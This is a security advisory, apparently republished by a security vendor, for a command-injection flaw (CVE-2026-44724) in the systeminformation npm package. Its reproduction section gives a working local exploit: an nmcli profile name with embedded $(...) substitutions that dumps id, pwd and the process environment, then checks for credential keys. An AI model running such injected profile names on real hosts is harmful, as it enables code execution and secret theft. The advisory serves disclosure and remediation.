Summary
On Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters.
This is not caused by a caller passing attacker-controlled arguments into networkInterfaces(). The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync().
This issue was validated locally against real NetworkManager and real nmcli. Calling only:
require('./lib').networkInterfaces()
was enough to trigger execution. The injected command ran with the privileges of the calling Node.js process.
Affected Component & Versions
Affected component:
lib/network.jsnetworkInterfaces()- Linux NetworkManager /
nmclihandling
Impact & Threat Model
Confirmed impact:
An attacker who can create or rename an active NetworkManager connection profile can execute arbitrary shell commands when a Node.js process using systeminformation calls networkInterfaces().
Confirmed realistic affected deployments include:
- local inventory agents
- monitoring agents
- diagnostics tools
- admin dashboard backends collecting host information
- privileged local desktop or device-management agents
If such a process runs with elevated privileges, the injected command executes with those same elevated privileges.
Confirmed facts:
- The payload was stored as a real NetworkManager connection profile name.
- Real
nmcli device statusreturned the name unchanged. networkInterfaces()parsed that value and reused it in shell commands.- The injected command ran as the calling Node.js process.
- Environment key categories were reachable from the injected process context.
Not claimed:
- No remote exploitation claim is made.
- No
AV:NorAV:Aclaim is made. - No SSID-to-connection-name attack path is claimed.
- File-delivery-only
.nmconnectionimport was not confirmed as a remote or unauthenticated path.
Root Cause Analysis
The root cause is inconsistent trust handling between the Linux interface name and the NetworkManager connection profile name.
The interface name is sanitized before it is embedded into shell commands:
const iface = dev.split(':')[0].trim();
const s = util.isPrototypePolluted() ? '---' : util.sanitizeShellString(iface);
However, the NetworkManager connection name is parsed from command output and later reused without equivalent sanitization:
const connectionNameLines = resultFormat.split(' ').slice(3);
const connectionName = connectionNameLines.join(' ');
return connectionName !== '--' ? connectionName : '';
That is unsafe because NetworkManager profile names can contain shell metacharacters. Quoting the value inside "${connectionName}" does not make it safe. A connection name containing ", $(), ;, backticks, or similar shell syntax can break out of the intended argument context or trigger command substitution.
The vulnerable code executes through execSync(), which invokes a shell for command strings. As a result, interpolating connectionName into the command string creates a command-injection sink.
Exact Code Flow & File Paths
Source: lib/network.js:538-544
function getLinuxIfaceConnectionName(interfaceName) {
const cmd = `nmcli device status 2>/dev/null | grep ${interfaceName}`;
try {
const result = execSync(cmd, util.execOptsLinux).toString();
const resultFormat = result.replace(/\s+/g, ' ').trim();
const connectionNameLines = resultFormat.split(' ').slice(3);
The parsed value is then returned as connectionName.
Trigger: lib/network.js:987-991
lines = execSync(cmd, util.execOptsLinux).toString().split('\n');
const connectionName = getLinuxIfaceConnectionName(ifaceSanitized);
dhcp = getLinuxIfaceDHCPstatus(ifaceSanitized, connectionName, _dhcpNics);
dnsSuffix = getLinuxIfaceDNSsuffix(connectionName);
ieee8021xAuth = getLinuxIfaceIEEE8021xAuth(connectionName);
Sink 1: lib/network.js:620
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.method;`;
Sink 2: lib/network.js:660
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.dns-search;`;
Sink 3: lib/network.js:676
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep 802-1x.eap;`;
There are three distinct exploitable connectionName sinks.
Proof of Concept (PoC) & Reproduction Steps
The following PoC is harmless and local-only. It uses a dummy NetworkManager connection and writes proof files under /tmp.
Run from the project root:
cd /path/to/systeminformation
Confirm proof files do not already exist:
test -e /tmp/si-nm-id-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-pwd-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-env-proof && echo EXISTS || echo NOT_YET
Create a malicious NetworkManager dummy profile:
nmcli connection add type dummy ifname si-nmghsa0 con-name 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'
Assign a documentation-only address so Node’s os.networkInterfaces() sees the dummy interface:
nmcli connection modify 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)' \
ipv4.method manual \
ipv4.addresses 192.0.2.253/32 \
ipv6.method disabled
Activate the profile:
nmcli connection up 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'
Confirm real nmcli exposes the malicious connection name unchanged:
nmcli device status | grep si-nmghsa0
Expected relevant output includes the active connection name:
si-nmghsa0 dummy connected si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)
Trigger the vulnerable library path with no attacker-controlled function argument:
node -e "const si=require('./lib'); si.networkInterfaces().then((interfaces)=>{const item=interfaces.find((entry)=>entry.iface==='si-nmghsa0'); console.log('saw_dummy_iface=' + Boolean(item)); if (item)
console.log(JSON.stringify({iface:item.iface, ip4:item.ip4, dhcp:item.dhcp, dnsSuffix:item.dnsSuffix, ieee8021xAuth:item.ieee8021xAuth}));}).catch((e)=>{console.error(e); process.exit(1);});"
Confirm command execution:
test -e /tmp/si-nm-id-proof && echo CONFIRMED || echo FAILED
cat /tmp/si-nm-id-proof
cat /tmp/si-nm-pwd-proof
Inspect environment key categories without printing secret values:
node -e "
const fs=require('fs');
const keys=fs.readFileSync('/tmp/si-nm-env-proof','utf8')
.split(/\n/).map(l=>l.split('=')[0]).filter(Boolean);
const wanted=['PATH','USER','HOME','SHELL','PWD','SSH_AUTH_SOCK','GITHUB_TOKEN','NPM_TOKEN','AWS_ACCESS_KEY_ID'];
console.log('env_key_count='+keys.length);
console.log('present_categories='+wanted.filter(k=>keys.includes(k)).join(','));
"
validated evidence:
saw_dummy_iface=true
uid=1000(smart) gid=1000(smart)
pwd=/home/smart/Downloads/systeminformation-master
env_key_count=74
present_categories=PATH,USER,HOME,SHELL,PWD,SSH_AUTH_SOCK
Local Validation Summary & Aggregate Reachability
Validation was performed against real NetworkManager and real nmcli. The primary proof did not rely on a PATH stub.
Observed behavior:
- The malicious profile was accepted by NetworkManager.
- The active connection name appeared unchanged in
nmcli device status. - Calling only
require('./lib').networkInterfaces()triggered execution. - The proof artifacts were created only after the library call.
- The
idoutput matched the calling Node.js process identity. - The
pwdoutput matched the Node.js process working directory. - The environment proof demonstrated access to process-environment categories without printing secret values.
Aggregate API reachability:
lib/index.js:94:getStaticData()reachesnetwork.networkInterfaces()as part of static data collection.lib/index.js:307:getAllData()reachesgetStaticData()first.
During local validation, an aggregate runtime attempt later hit an unrelated osinfo.js error in that environment. Because of that, aggregate source reachability is confirmed, but aggregate call completion was not used as the primary exploit proof.
Why This Is Not Intended Behavior
networkInterfaces() is documented and expected to return network interface metadata such as interface name, IP addresses, DHCP state, DNS suffix, and IEEE 802.1X status.
The library already shows an intent to protect shell command construction by sanitizing interface names before shell use. The missing sanitization for connectionName is inconsistent with that defensive pattern.
Executing shell commands embedded in a NetworkManager profile name is not a documented feature, not required to return network metadata, and not an expected design tradeoff. This is a command injection vulnerability caused by unsafe shell-string construction.
Regression Test Ideas
Add Linux-specific tests for NetworkManager connection names containing shell metacharacters.
Suggested malicious connection names:
name$(...)name"; ...; #- ``name`...```
name|...name;...
Expected behavior after the fix:
networkInterfaces()completes without executing shell syntax from the connection name.- No marker files or equivalent side effects are produced.
- The function either returns metadata for the interface or safely returns unknown/default values for fields that cannot be queried.
- Tests cover all three current sink helpers:
- DHCP lookup
- DNS suffix lookup
- IEEE 802.1x auth lookup
For unit-level coverage, mock the NetworkManager command wrapper so that nmcli device status returns a connection name containing metacharacters, then assert that subsequent calls use argument arrays rather than shell strings.
Credit request
If you publish an advisory or assign a CVE, please credit me as:
Ali Firas (thesmartshadow) - https://www.smartshadow.dev
Impact
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
CVE-2026-44724 has a CVSS score of 7.8 (High). The vector is requires local access, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.31.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Avoid shell interpolation entirely for NetworkManager calls.
Replace shell command strings with execFileSync() or spawnSync() using argument arrays. For example:
const { execFileSync } = require('child_process');
const output = execFileSync(
'nmcli',
['connection', 'show', connectionName],
util.execOptsLinux
).toString();
Recommended code-level changes:
- Replace
nmcli device status 2>/dev/null | grep ${interfaceName}with argument-array execution and filter rows in JavaScript. - Replace every
nmcli connection show "${connectionName}" | grep ...shell string with argument-array execution. - Parse
ipv4.method,ipv4.dns-search, and802-1x.eapin JavaScript instead of using shellgrep. - Treat NetworkManager profile names as untrusted input even though they originate from local system state.
- Do not rely on quoting or escaping as the main mitigation. Argument-array execution is the correct fix.
Frequently Asked Questions
- What is CVE-2026-44724? CVE-2026-44724 is a high-severity OS command injection vulnerability in systeminformation (npm), affecting versions >= 4.17.0, <= 5.31.5. It is fixed in 5.31.6. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2026-44724? CVE-2026-44724 has a CVSS score of 7.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of systeminformation are affected by CVE-2026-44724? systeminformation (npm) versions >= 4.17.0, <= 5.31.5 is affected.
- Is there a fix for CVE-2026-44724? Yes. CVE-2026-44724 is fixed in 5.31.6. Upgrade to this version or later.
- Is CVE-2026-44724 exploitable, and should I be worried? Whether CVE-2026-44724 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-44724 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44724? Upgrade
systeminformationto 5.31.6 or later.